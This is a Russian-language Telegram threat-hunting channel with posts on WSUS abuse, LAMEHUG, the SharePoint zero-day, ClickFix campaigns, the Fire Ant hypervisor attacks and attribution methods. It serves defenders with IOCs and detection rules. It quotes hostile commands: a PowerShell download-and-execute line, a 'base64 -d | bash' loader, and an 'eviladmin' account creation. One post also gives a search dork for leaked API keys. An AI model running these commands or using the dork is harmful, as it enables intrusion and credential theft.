Threat Hunting Father 🦔
3.38K subscribers
873 photos
24 videos
42 files
645 links
• All about Threat Hunting, detecting malicious activity.
• We try to see interesting APT, TTP, instruments and features of systems, what use attacker’s
For educational purposes only🧠
https://t.me/boost/ThreatHuntingFather
Download Telegram
📡 WSUS: твой сервер обновлений или хакерский шлюз?

Lorenzo Meacci разобрал, как WSUS превращается в хакерский хайвей для LPE, lateral movement и C2-доставки. Windows Server 2022 под ударом, и вот почему админам пора пить кофе покрепче. 🍺

Как ломают WSUS:
1️⃣ MITM + ARP Spoof = Game Over
Забыл HTTPS? Поздравляю, через HTTP твой WSUS качает фейковый .cab с PsExec. Новый юзер в local admins? Легко.
💥 Pro tip: без TLS твой WSUS — это просто хакерский FTP.

2️⃣ WSUS Admin Abuse? Пфф, детская шалость
С доступом к WSUS (SharpWSUS или консоль) пихаем "легит" апдейт: net user eviladmin /add. Аппрувим и вуаля — клиент выполняет. HTTPS? Не спасает, подпись никто не проверяет.

3️⃣ LPE через сам WSUS
WSUS-сервер в GPO как клиент? Загружаем "обновление", триггерим вручную — получаем SYSTEM shell.

4️⃣ Stealth Payloads для OPSEC
Забудь шумный PsExec. Берем ADCS, запрашиваем код-сигн сертификат, подписываем свой шелл, п(sign) → pywsus → reverse shell. EDR спит, ведь сертификат "легит". 😉

5️⃣ NTLM Relay + RBCD = DCSync
Перехватываем NTLM, релеим на ADCS (ESC8) или цепляем RBCD через msDS-AllowedToActOnBehalfOfOtherIdentity. Итог? Полный домен твой

🧨 Реальность:
Работает, если GPO кривые, HTTP включен, а ADCS открыт для всех. Но если звёзды сошлись — ты уже в DC, пока Blue Team ищет логи.

🛡 Detection:
- Event ID 364, wusa.exe, подозрительные .cab — лови в SIEM.
- GPO: бан для "intranet signed updates".
- HTTPS only, аудит аппрувов, лок на WSUS Admin.
- EDR/XDR с нормальным мониторингом certsrv и net user.

📖 https://lorenzomeacci.com/wsus-exploitation-all-you-need-to-know
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥101
Good news, free TI, give me two 🎧

Threat Intelligence in ANY.RUN continues to evolve — not only by adding more features, but by making the right ones easier to use. We’ve simplified access to ANY.RUN Threat Intelligence with a free version of TI Lookup.  
You now can explore Public Samples, TTPs, Suricata rules, and malware trends inside our Threat Intelligence product in a cleaner, faster way. 
It’s about putting existing value in the right place, for the right audience. For analysts and teams starting with
ANY.RUN in a Threat Intelligence context, this is a much better entry point. 
It’s a step to help you do less — so you can focus on more. 

•Alex Lapshin

🔗 https://any.run/cybersecurity-blog/threat-intelligence-lookup-new-plan/

🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13👍32
🧠 UAC-0001 и LAMEHUG: атаки с LLM-поддержкой
🎯 Цель: госструктуры и оборонный сектор Украины
🔍 Источник: CERT-UA #16039

📥 MITRE: Initial Access
🎣 Фишинговые письма якобы от министерств
Вложение: Додаток.pdf.zipДодаток.pif
Распространение через скомпрометированный email boroda70@meta.ua

⚙️ Execution / Command & Control
.pif — скомпилированный PyInstaller-лоадер на Python
Выполняет LAMEHUG — малварь, использующая LLM Qwen 2.5-Coder-32B-Instruct через api.huggingface.co
LLM генерирует команды Windows на основе описания (вшитого в код)

🧰 Примеры задач, которые выполняет LAMEHUG
📂 Сбор и сохранение инфы в %PROGRAMDATA%\info\info.txt:
systeminfo, tasklist, net start, ipconfig /all, whoami, wmic, dsquery — полный инвентарь машины
📁 Рекурсивный поиск .doc/.pdf/.txt в Desktop/Downloads/Documents
🚀 Передача данных:
Варианты: SFTP (на 144.126[.]202[.]227:22) или HTTP POST на stayathomeclasses[.]com/slpw/up[.]php

📡 C2 & Exfiltration
Использование LLM API как C2-канал
Команды формируются динамически, обходя статический анализ
Утечка идёт через обычные каналы (HTTP, SFTP) с легитимных (но взломанных) хостов

🐾 Атрибуция и версии
CERT-UA приписывает атаку группировке UAC-0001 (APT28)
Найдены несколько версий LAMEHUG:
AI_generator_uncensored_Canvas_PRO_v0.9.exe
AI_image_generator_v0.95.exe
image.py

🧠 Почему это опасно
Первое зафиксированное использование LLM для real-time генерации команд на целевой машине

LLM позволяет:
динамически адаптировать поведение
маскировать C2
эволюционировать технику без апдейта самой малвари

🧷 Detection & Hunting
🐱 IOC (файлы, хосты, сети):
%PROGRAMDATA%\info\info.txt, cmd.exe /c "mkdir ... && systeminfo >> ..."
C2, stayathomeclasses[.]com,

📊 Поведенческие признаки:
Подозрительные вызовы dsquery, wmic, массовые операции в cmd.exe
Обращения к API HuggingFace с систем Windows

🚧 Detection tips
detection:
selection:
ParentImage: '*\cmd.exe'
CommandLine|contains:
- 'wmic'
- 'dsquery'
- 'systeminfo'
condition: selection

Рекомендации
🔐 Блокировать .pif и .zip во вложениях(не ломать логику бизнеса)
🌐 Контроль outbound-трафика на api[.]huggingface[.]co
⚠️ Мониторинг Python/LLM-процессов с сетевой активностью

Вывод 💀
LAMEHUG — первый задокументированный пример использования LLM как инструмента интерактивного C2. Это качественный сдвиг: теперь ИИ не только генерирует фишинг и deepfake, но и сам рулит заражённой машиной в режиме реального времени.
Динамичные, контекстные атаки — новая реальность.
Будьте готовы к эпохе LLM-as-a-backdoor.

🔗 https://cert.gov.ua/article/6284730
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥73
Limited THF мерч drop🛸

Ну что threat hunter’ы, решил порадовать вас 😃

Условия розыгрыша максимально простые:

1️⃣ Подписка на канал THF

2️⃣ Оставить коммент, под постами, которые показались весьма информативными

3️⃣ Улыбнуться 🦔


🗓 Победителям удачи, выберем с помощью рандомайзера.

Поддержать THF 👇
https://t.me/boost/ThreatHuntingFather

Удачи, охотник! 😵
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1510👍21🤡1
Forwarded from Just Security
Zero-day в SharePoint (CVE‑2025‑53770)

18 июля эксперты Eye Security зафиксировали масштабную атаку на on‑prem SharePoint, включающей цепочку из CVE‑2025‑49706 и CVE‑2025‑49704, теперь уже получившей идентификатор CVE‑2025‑53770. Эксплойт позволяет внедрить web‑shell без авторизации.

• Эксплуатация происходит через POST запрос к /_layouts/15/ToolPane.aspx с Referer=/_layouts/SignOut.aspx.
• Сохраняется файл spinstall0.aspx - дампер, извлекающий ValidationKey, позволяя создавать псевдо‑валидные ViewState‑токены с помощью ysoserial и получать RCE.
• Массовое сканирование показало десятки заражённых серверов в первой волне (~18 июля) и второй (~19 июля) .


По данным Eye Security:
• Первая волна: IP 107.191.58.76 (~18 июля, 18:06 UTC)
• Вторая волна: IP 104.238.159.149 (~19 июля, 07:28 UTC)


Комментарий Microsoft:
Обнаружено активное использование уязвимости. Патч пока отсутствует. SharePoint Online не затронут. Рекомендации: подключить Defender + AMSI‑интеграцию, отключить сервер от Интернета до выхода обновления.

Наш комментарий:

Наши аналитики SOC уже столкнулись с попытками эксплуатации данной уязвимости, необходимо принять следующие меры:

1. Изолируйте все on‑prem SharePoint-серверы.
2. Испольлуйзете Defender + AMSI в SharePoint‑окружение и проведите сканирование.
3. Проверьте IIS‑логи на запросы со следующими метриками:
• POST /layouts/15/ToolPane.aspx?DisplayMode
• Referer /layouts/SignOut.aspx
• GET /layouts/15/spinstall0.aspx
4. Сделайте поиск по файлу spinstall0.aspx
5. При обнаружении следов копрометации запустите процесс расследования инцидента.

Источники:

research.eye.security
SANS Internet Storm Center
SecurityWeek
👍2
UNG0002: Южноазиатская APT с кастомными RAT'ами, ClickFix и цепочками скриптов
🎯 Цели: оборона, энергетика, авиация, образование, геймдев, медицина
🗓 Кампании: Cobalt Whisper (май–сентябрь 2024) и AmberMist (январь–май 2025)
🔍 Seqrite Labs — original report

📥 MITRE: Initial Access / Execution
🧷 Shortcut Infection Chains
Распространение через .LNK-файлы, замаскированные под резюме (например, “Resume_UI_Designer.lnk”)
Цепочка: LNKVBScriptBATPowerShell
Основной запуск PowerShell через wscript.exe
📄 ClickFix Social Engineering
Жертва открывает поддельную CAPTCHA-страницу (например, якобы от Ministry of Maritime Affairs of Pakistan)
JS вызывает PowerShell:
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://<malicious>)"

Без MOTW, без предупреждений — просто "подтверди, что ты не робот"

🛠 Post-Exploitation Tools & Implants
🔹 Operation Cobalt Whisper (2024)
Инструменты:
Cobalt Strike
Metasploit
Цели: оборонка, авиастроение, энергетика
Payload’ы хранятся в %ProgramData%, %Temp%, %AppData%
🔹 Operation AmberMist (2025)
Кастомные RAT-импланты:
Shadow RAT — DLL, собрана с путём C:\Users\The Freelancer\source\repos\JAN25\mustang\...
INET RAT — форк Shadow, PDB: memcom.pdb
Blister DLL — шеллкодный загрузчик
Техника загрузки:
DLL sideloading через легитимные бинарники:
rasphone.exe
nw.exe (Node-Webkit)
Путь к DLL: рядом с бинарником или в %Temp%

🧩 Key Findings из отчёта
🔸 Multi-Stage Attacks
→ Sophisticated infection chain с .lnk, .vbs, .bat, PowerShell → кастомные RAT (Shadow, INET, Blister)
🔸 ClickFix Social Engineering
→ Fake CAPTCHA → PowerShell запуск
→ Тематические ресурсы: подделка сайтов госсектора
🔸 DLL Sideloading Abuse
rasphone.exe, nw.exe грузят вредоносные DLL
→ Имена бинарников и путей соответствуют реальным программам
🔸 CV-Themed Decoys
→ Резюме UI-дизайнеров, студентов из престижных ВУЗов
→ Документы реалистично оформлены и заточены под цель атаки
🔸 Persistent Infrastructure
→ Повторяющиеся паттерны имён, стабильные C2
→ OPSEC соблюдается между кампаниями
→ Возможен off-the-shelf builder: структура файлов идентична


🎭 Evasion & Attribution
Использование существующих фреймворков и подражание другим APT
PDB-имена “Shockwave”, “Mustang” — возможная ложная флагировка
Сильно варьирующийся арсенал с элементами от red-team тулкитов до кастомных сборок
По оценке Seqrite, группа с высокой долей вероятности базируется в Юго-Восточной Азии

🔍 Detection Ideas (EDR/Hunting)
Поведенческий анализ цепочек .lnkwscript.exepowershell.exe
Использование легитимных бинарников с DLL в AppData, Temp, ProgramData
DNS и HTTP-запросы с похожими паттернами: фейковые CAPTCHA, подозрительные CDN
Регистрация задач планировщика с DLL или неизвестными PowerShell-командами
Аномалии в rasphone.exe и nw.exe (не типичны для интерактивного пользователя)

Рекомендации защитникам
Мониторить запуск PowerShell из wscript.exe, особенно после .lnk
Контроль над DLL sideloading и аудит путей с rasphone.exe, nw.exe
Использовать IOC и YARA/regex по PDB (mustang, memcom)
Обучение пользователей — особенно тех, кто получает резюме или работает с CAPTCHA/порталами
Установить блокировки на ClickFix-подобные поведения (mshta + сохранение .hta, fake CAPTCHA scripts)

📌 https://www.seqrite.com/blog/ung0002-espionage-campaigns-south-asia/
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
1011
Linux Linux Linux(правда же? у вас есть любители админы/сервера, а их любит APT)
5
Forwarded from Whitehat Lab
🐧 Linux Threat Hunting Persistence

Автор статьи демонстрирует, как искать признаки присутствия злоумышленника (persistence) в Linux с помощью open source инструментов и стандартных средств ОС

Рассмотренные методы сохранения доступа:

▪️SSH Keys
▪️Crontab
▪️Bashrc
▪️APT
▪️Privileged user & SUID bash
▪️Malicious Systemd
▪️Hunting LKM Rootkits
▪️LD_PRELOAD rootkit
▪️PAM Backdoor
▪️ACL
▪️init.d
▪️Motd
▪️Mount process for hide any pid
▪️Webshells
▪️rc.local


🔗 Article

#linux #persistence #threathunting

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥82
Another quick and dirty Linux hunt for Velociraptor. 🔍

LD_PRELOAD is well known technique to hijack execution flow and inject malicious code into every dynamically linked process.
ATT&CK - https://attack.mitre.org/techniques/T1574/006/

1. Parses /etc/ld.so.preload
2. Parses all /proc/<pid>/environ for any LD_PRELOAD= entries

🦖Linux.Persistence.LdPreload - https://docs.velociraptor.app/exchange/artifacts/pages/ldpreload/
🦔THF
Please open Telegram to view this post
VIEW IN TELEGRAM
54👍2
Scanner for the SharePoint CVE-2025-53770 RCE zero day vulnerability.

🔗 https://github.com/hazcod/CVE-2025-53770
Extra info: https://github.com/ZephrFish/CVE-2025-53770-Scanner
🦔THF
Please open Telegram to view this post
VIEW IN TELEGRAM
15🥱3🤡2🗿1💊1
🔍 Mac Forensics: Артефакты Apple 🍎

Windows давно стал стандартом в судебной экспертизе, но атакующие идут туда, где их не ждут. Всё чаще — на macOS.
Форензика Mac требует другой методологии.
Здесь нет Prefetch, Registry, SRUM.
Но это не чёрный ящик — если знаешь, куда смотреть.
🎯 Ключевые артефакты macOS:
Unified Logs (/var/db/diagnostics/, /var/db/uuidtext/) — аналог Windows Event Logs от Apple: подробные системные логи, но в сжатом бинарном формате, синхронизированы с загрузкой системы.
TCC.db — отслеживает разрешения приложений (например, доступ Terminal к микрофону). Отлично подходит для выявления злоупотреблений приватностью и подозрительных бинарников.
Quarantine Events (атрибут com.apple.quarantine) — фиксирует загрузки файлов и URL-источники, помогает в анализе малвари.
Spotlight Metadata (.store.db) — быстрый способ получить представление об активности на диске без полного парсинга файловой системы.
KnowledgeC.db — настоящий клад для DFIR: отслеживает активность приложений, разблокировки экрана, подключения USB и многое другое.
⚙️ Инструменты для сбора и анализа:
mac_apt (Mac Artifact Parsing Tool) — мощный инструмент для пакетной выгрузки plist, логов и SQLite-баз.
Velociraptor — поддерживает охоту за артефактами на macOS в масштабах всей инфраструктуры, отлично подходит для live response.
APOLLO (от MITRE) — специализирован на KnowledgeC и других базах данных Apple.
FileVault 2 — важно: для снятия образа требуется расшифрованный доступ — либо live response, либо Target Disk Mode и учётные данные пользователя.
🧪 Пример из практики:
При компрометации MacBook разработчика стандартные логи EDR почти не помогли.
С помощью mac_apt был извлечён KnowledgeC.db, где обнаружилось:
• запуск Terminal в 02:13
• монтирование USB в 02:14
• активность scp сразу после
Сопоставив это с Unified Logs, подтвердили попытку эксфильтрации через shell-скрипты и определили dwell timeатакующего — менее 6 минут.

Вывод:
Mac — не экзотика, а полноправная часть корпоративной поверхности атаки.
Убедитесь, что ваш forensic-плейбук включает экосистему Apple.

🦔THF
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1133🔥1💊1
Fire Ant — гипервизорная APT-угроза👽
С начала 2025 года Sygnia расследует масштабную шпионскую кампанию, нацеленную на инфраструктурный уровень:
• VMware vCenter
• VMware ESXi
• Сетевые устройства (F5, Linux pivot-хосты)
Главный вектор — эксплуатация уязвимостей в гипервизоре и инфраструктуре. Это позволяет атакующим:
• обойти EDR/AV
• двигаться между сегментами сети
• сохранять доступ после зачистки
Этапы атаки ⌨️
1. Первичный доступ
CVE‑2023‑34048 (vCenter RCE)

• Атака через DCERPC → OOB Write → RCE без аутентификации
• Краш vmdird зафиксирован до начала активности
Подделка сессии в vCenter UI
• Скрипт vCenter_GenerateLoginCookie.py
• Использует сертификаты, извлечённые с хоста
• Позволяет получить админ-доступ без логина или логов аутентификации (сессия создаётся через поддельный cookie, это критично)

Кража учётных данных vpxuser
• Служебный аккаунт с root-доступом к ESXi
• Не отключается Lockdown Mode’ом

2. Устойчивость в инфраструктуре
Backdoor в vCenter (ksmd)

• Путь: /usr/libexec/setconf/ksmd
• TCP порт 7475
• Позволяет выполнять команды и передавать файлы
• Связан с семейством VIRTUALPITA
Malicious VIBs на ESXi
• Установлены вручную с флагом --force
• Прописывают исполняемые файлы в /bin, скрипты в rc.local.d/
• Бесподписные, уровень доверия — "partner"
Backdoor autobackup.bin
• Прописывается в /etc/rc.local.d/local.sh для автозапуска
• Запускает web-сервер на порту 8888
• Поддерживает RCE, загрузку и скачивание файлов
• Совместим с Python 2/3, работает как background-демон через double-fork и редирект stdout/stderr в /dev/null
Отключение логов (vmsyslogd)
• Убийство процесса лишает ESXi логирования
• Нет ни локальных, ни удалённых журналов

3. Атаки на гостевые ВМ с гипервизора
CVE‑2023‑20867 (VMware Tools)

• Позволяет выполнять команды внутри ВМ без логина
• Используется PowerCLI и Invoke-VMScript
• Команды исполняются через vmtoolsd.exe
Патчинг VMX-процесса через ELF tools
• Модификация памяти ESXi-хоста
• Отключает необходимость аутентификации гостя
Дамп хэшей из памяти ВМ
• Snapshot с vim-cmd, затем анализ .vmem с UpdateApp (Volatility fork)
• Извлекаются NTLM-хэши, в том числе с DC
EDR tampering (updatelog.exe)
• Вызывается через vmtoolsd.exe
• Нарушает работу SentinelOne
Нарушает видимость процессов у EDR без его остановки — агент остаётся активен, но ничего не видит
V2Ray туннель (update.exe)
• Устанавливает прослушку на TCP 58899
• Используется как C2 и обход прокси/фильтров
Незарегистрированные ВМ (vmx -x)
• Прямой запуск VM без vCenter
• MAC spoofing → не отслеживается админкой
• Только через L2-инвентаризацию можно отследить

4. Сетевая экспансия и туннелирование
F5 Load Balancer: CVE‑2022‑1388

• Выполнение команд без логина
• Webshell в /xui/common/css/css.php
Туннель Neo-reGeorg
• Устанавливается на внутренних веб-серверах
• Создаёт HTTPS-туннель через firewall
Medusa Rootkit на Linux pivot-хостах
• Скрытый shell
• Логгирует SSH-пароли в remote.txt
netsh portproxy на admin-хостах
• Проброс портов к системам
• Используется для обхода ACL и firewall
IPv6 bypass
• В большинстве сетей IPv6 не фильтруется
• Атакующий использует этот канал для туннелей

5. Устойчивость к зачистке
• Повторный вход после очистки
• Переименование малвари под forensic-инструменты
• Отслеживание действий защитников и адаптация
• Только одновременная, скоординированная зачистка эффективна

🗺Детект и защита
Что искать

• Внезапное отключение vmsyslogd
• Старт процессов от vmtoolsd.exe внутри ВМ
• Новые бинарники в /tmp, /scratch, /bin, /etc
• ВМ без регистрации в vCenter (через vmx -x)
• ВМ активна, но EDR не отдаёт телеметрию
🔐Как защититься
• Патчить: vCenter, ESXi, F5, VMware Tools
• Включить Lockdown Mode и Secure Boot
• Доступ к vCenter — только через jump/PAM
• Регулярная ротация паролей, хранение в vault
• Включить syslog и форвардить логи централизованно

🔗 https://www.sygnia.co/blog/fire-ant-a-deep-dive-into-hypervisor-level-espionage
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥642
🧐 RuleSetRAT: кастомные YARA-правила и анализ RAT-билдеров

Что делать, если нужного сэмпла нет на VirusTotal, а сигнатуры не ловят специфический билд RAT'а? RuleSetRAT — это лабораторный репозиторий с реверсом, CAPA-анализом и YARA-правилами под каждую вариацию.

🎯 Цель проекта —
This repository provides a curated set of variant-specific YARA detection rules and detailed static analysis reports for various Remote Access Trojan (RAT) families and builder samples. The goal is to support professionals in the cybersecurity field with actionable intelligence, reverse engineering insights, and precision detection capabilities.


📦 Что внутри:
• Builder.yara — правило под конкретный билд
• CAPA/ — извлеченные фичи поведения
• DIE/ — PE-структура, метки, офускации
• Все сэмплы сгенерированы вручную через билдеры в QEMU-песочнице

🧬 Важное:
• Образцы не публикуются, только метаданные
• Все правила тестируются вручную
• Поддержка traceable коммитов — видно эволюцию правил и анализа

🔖 Документация:
• Методология генерации
• Внутренние политики хэшей
• YARA шаблоны
• Анализ билдов типа Z_dem0n10

🔐 Этический фреймворк:
• Только для защиты, аналитики и обучения
• Никаких боевых payload'ов
• This project is strictly intended for educational, academic, and ethical cybersecurity research purposes.


☝️ https://github.com/GokbakarE/RuleSetRAT

Если ты охотишься за малварью и пишешь кастомные сигнатуры — этот проект тебе в закладки. Идеальный референс для понимания, как из билдера рождается RAT и как его поймать до первого beacon'а.

🦔 THF 🚀
Please open Telegram to view this post
VIEW IN TELEGRAM
9🔥52
🍏macOS ClickFix: фишинг через AppleScript без загрузки файлов

🖥ClickFix 2.0 (теперь без explorer у windows) нацеливается на macOS — жертве показывается фейковая CAPTCHA и сообщение:
"Обнаружена подозрительная активность. Вставьте эту команду в Terminal для восстановления."

команда:
echo 'BASE64' | base64 -d | bash

🎹 Что делает payload:
• крадёт данные браузеров (Firefox, Chrome, Brave)
• собирает кошельки MetaMask, BNB, IndexedDB
• копирует cookies Safari, заметки, keychain
• ворует документы (.txt, .pdf, .docx и др.)
Всё упаковывается в /tmp/out.zip (через ditto) и отправляется на http://C2/log через curl.
После этого скрипт удаляет временные файлы, включая сам архив.

🌐Инфраструктура можно поискать на hunt.io:
• обнаружено более 50 серверов
• подозрительный порт 3333 с панелью (отдаёт 404 по умолчанию)
• SSH и iperf3 на 5201
• CORS-заголовки позволяют любой Origin и Cookie — можно красть сессии

😡Evasion:
• не требует .app/.pkg
• не содержит вложений
• всё запускается руками жертвы
• base64 -d | bash — ключевой индикатор

✍️Рекомендации:
• следить за osascript, curl, base64 в Terminal
• мониторить Clipboard-to-Terminal поведение
• учить пользователей не запускать команды из браузера
• ужесточить CORS-политики
• отслеживать трафик на нестандартные порты (3333, 5201)

🔗 https://hunt.io/blog/macos-clickfix-applescript-terminal-phishing

🦔THF 🚀

ClickFix на macOS — фишинг без файлов, стилер без скачивания, эксфиль без шума.
macOS больше не "безопасная платформа", особенно с такими атаками.
Следим за base64 -d | bash — это новый wscript.exe для Mac.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥53👍1
🦔 site: chatgpt. com/share api key 🔓
Please open Telegram to view this post
VIEW IN TELEGRAM
10
🔂 Unit 42 Attribution Framework: когда атрибуция НЕ пальцем в небо🤙

Атрибуция в threat intelligence — зона с высоким риском ошибочных выводов. Одни видят китайский почерк, другие — криминал, третьи — просто совпадение IoC.
Unit 42 (Palo Alto Networks) не стали спорить, а просто предложили структурированный фреймворк🐸, чтобы избавить отрасль от “атрибуции на глазок” и ввести единые стандарты анализа.

👽Три уровня атрибуции
1. Activity Cluster (CL-)
Базовое объединение инцидентов:
∙ минимум 2 связанных события (например, общее SHA256 или инфраструктура)
∙ не требует полной kill chain или знания оператора
∙ обозначается по мотивации: CL-STA-0001, CL-CRI-0002, CL-MIX-0003, CL-UNK-0004
2. Temporary Threat Group (TGR-)
Продвинутый этап:
∙ наблюдение минимум 6 месяцев
∙ формальное построение по Diamond Model (Adversary, Infrastructure, Capability, Victim)
∙ сопоставление TTP, конфигураций инструментов, OPSEC-ошибок
∙ пример: TGR-STA-0023
3. Named Threat Actor
Финальный уровень:
∙ высокая уверенность (High Confidence)
∙ подтверждение по множеству источников (A2 и выше по Admiralty Scale)
∙ присваивается название, например: Stately Taurus

⚖️Admiralty System: как оценивают источники
Надёжность (Source Reliability):
∙ A — надёжен, проверен (например, внутренняя телеметрия)
∙ B/C — допустим, но с оговорками
∙ F — неизвестный источник
Достоверность (Information Credibility):
∙ 1 — подтверждено и логично
∙ 4 — сомнительно
∙ 6 — не поддаётся оценке
Примеры:
∙ A1 — жёстко заданный C2 IP в малвари + внутренняя телеметрия
∙ C4 — подозрительный URL без контекста

🔎Что проверяется на каждом уровне
TTP-анализ:
∙ Cluster: общие техники и инструменты
∙ TGR: эволюция тулов, уникальные конфигурации
∙ Named Actor: устойчивый и уникальный TTP-профиль
Инфраструктура:
∙ Cluster: совпадения по IP, TLS, DNS
∙ TGR: поведенческие паттерны регистрации, reuse хостинга
∙ Named Actor: долгосрочная привязка инфраструктуры
Целевые жертвы:
∙ Cluster: один регион или отрасль
∙ TGR: общие технологии и цели атак
∙ Named Actor: устойчивое мотивированное поведение
Хронология:
∙ Cluster: временная близость событий
∙ TGR: связь с внешними событиями
∙ Named Actor: многолетние кампании
OPSEC-паттерны:
∙ оставленные handle'ы
∙ повторяющиеся ошибки в коде
∙ шаблоны в инфраструктуре

Пример: Bookworm → Stately Taurus
∙ В 2015 Unit 42 описали Bookworm, но без привязки к группе
∙ В 2023 активность Bookworm оформлена как кластер
∙ В 2025 — на основе телеметрии, инфраструктуры и поведения — окончательно связана с группой Stately Taurus
Каждое решение валидируется через Attribution Review Board

🖥Полезные ссылки:
∙ Diamond Model of Intrusion Analysis: https://apps.dtic.mil/sti/pdfs/ADA486945.pdf
∙ Unit 42 Attribution Framework (2025): https://unit42.paloaltonetworks.com/unit-42-attribution-framework/
∙ Threat Actor Groups Tracked by Unit 42: https://unit42.paloaltonetworks.com/threat-groups/

Этот фреймворк — не просто внутренняя методика, а открытый стандарт, полезный для любой команды, занимающейся CTI, IR или threat hunting.
Он структурирует мышление, повышает точность и помогает объяснить "почему вы так решили".

🦔THF
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥4🥱11